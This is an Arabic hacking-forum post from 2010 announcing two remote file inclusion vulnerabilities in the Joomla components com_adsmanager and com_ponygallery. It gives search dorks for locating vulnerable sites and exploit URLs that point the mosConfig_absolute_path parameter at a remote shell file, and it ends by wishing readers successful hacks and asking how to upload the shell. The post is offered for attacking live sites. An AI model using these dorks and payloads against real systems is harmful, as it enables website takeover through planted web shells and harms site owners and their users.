التواصل المباشر مع الادارة والاعضاء القدامى من خلال قناة التلغرام



العودة   :: vBspiders Professional Network :: > [ ::. الـقرصـنـة والأختراق ~ The Hidden World Of Hackers .:: ] > قـسـم إخـتـراق الـمـواقـع والـسـيرفـرات

 
 
LinkBack أدوات الموضوع انواع عرض الموضوع
قديم 12-23-2010, 03:18 PM   رقم المشاركة : 1 (permalink)
معلومات العضو
 
الصورة الرمزية hacker-10
 

 

 
إحصائية العضو






hacker-10 غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
hacker-10 is on a distinguished road

افتراضي ثغرات جديدة في سكربت Joomla


السلام عليكم ورحمة الله تعالى و بركاته

ظهرت ثغرتان جديدتان في سكريبت joomla

الثغرة الاولى Joomla Component com_adsmanager Remote File Include

تاريخ اكتشاف الثغرة 23/12/2010

مكتشف الثغرة : AtT4CKxT3rR0r1ST

تحميل السكربت : http://downloads.ziddu.com/downloadf...adsmanager.zip

و الآن الشيء المهم

الدورك :
كود PHP:
inurl:"com_adsmanager" 
الاستغلال :

كود PHP:
www.site.com/index.php?option=com_adsmanager&mosConfig_absolute_path=[shell.txt?] 
حيث site.com هو الموقع

و [?shell.txt] هو رابط الشل بصيغة txt
-----------------------------------
الثغرة الثانية
Joomla Component com_ponygallery Remote File Inclusion Vulnerabilities


تاريخ اكتشاف الثغرة 23/12/2010

مكتشف الثغرة AtT4CKxT3rR0r1ST

الدورك

كود PHP:
inurl:"com_ponygallery" 
الاستغلال


كود PHP:
www.site.com/components/com_ponygallery/admin.ponygallery.html.php?mosConfig_absolute_path=[shell.txt?] 
او


كود PHP:
www.site.com/components/com_ponygallery/admin.ponygallery.php?mosConfig_absolute_path=[shell.txt?] 
حيث site.com هو الموقع

و [?shell.txt] هو رابط الشل بصيغة txt

شباب لي طلب ...ممكن شرح لكيفية رفع الشل من هذه الثغرة

اختراقات موفقة




eyvhj []d]m td s;vfj Joomla


التعديل الأخير تم بواسطة hacker-10 ; 12-23-2010 الساعة 03:21 PM.

   

رد مع اقتباس
 

مواقع النشر (المفضلة)


تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة
Trackbacks are متاحة
Pingbacks are متاحة
Refbacks are متاحة

الانتقال السريع


الساعة الآن 04:23 AM


[ vBspiders.Com Network ]

SEO by vBSEO 3.6.0